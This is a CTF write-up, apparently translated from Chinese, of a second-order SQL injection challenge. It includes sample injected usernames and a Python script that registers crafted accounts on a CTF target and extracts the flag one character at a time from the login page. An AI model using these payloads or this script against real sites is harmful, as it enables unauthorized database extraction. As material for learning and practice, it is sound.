- Title description: SQL injection
- Access is a login page
- dirsearch scanned it
- Visit register.php
- Registered an account to log in, it seems useless to return to the login page
- But here I thought of an injection method mentioned when I wrote the basics of sql injection but did not study it carefully.
二次注入
- The point injected here should be in
register.php
the name on the page
- Because the email and password still need to be used when logging in
- For details, please see my previous article
- The single quote registration failed, so I changed the user name to
root' and '1
here and the registration was successful
- That is to say, the closing method here should be closed with single quotes and there is no escaping of addslashes() that I learned before.
- At this time, logged in and the user name is 0
- So here it is necessarily exist sql injection but I try to register the name for the
1' union select 1,database()#
time
- It also returned one,
nnnnoooo!!!!
that is, there is still a filter here? ? ? ?
- So you need to fuzz with burpsuit
- Filter a lot of things
information_schema
are filtered out true I do not know how I did not expect to engage in
- Helpless wp
- Attach the script of the boss
import requests
import re
register_url = 'http://111.200.241.244:45701/register.php'
login_url = 'http://111.200.241.244:45701/login.php'
for i in range(1, 100):
register_data = {
'email': '[email protected]%d' % i,
'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
'password': 'admin'
}
res = requests.post(url=register_url, data=register_data)
login_data = {
'email': '[email protected]%d' % i,
'password': 'admin'
}
res_ = requests.post(url=login_url, data=login_data)
code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
print(chr(int(code.group(1))), end='')
- The following is my own understanding
- Since it is the user name that can be injected twice and it
information_schema
is filtered, it is definitely not possible to use union injection.
+
The role of the mysql medium is to convert characters into numbers and add them
'1' + '1a'
'0' + database()
'0' + substr(database(),1,1)
- So the core injection code is
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
- After that, the user name value of the login.php page is obtained through the regularity, which is the ascii code value of each digit of the flag.
- I want to add my knowledge of mysql. What I learned before is not enough to do the current topic...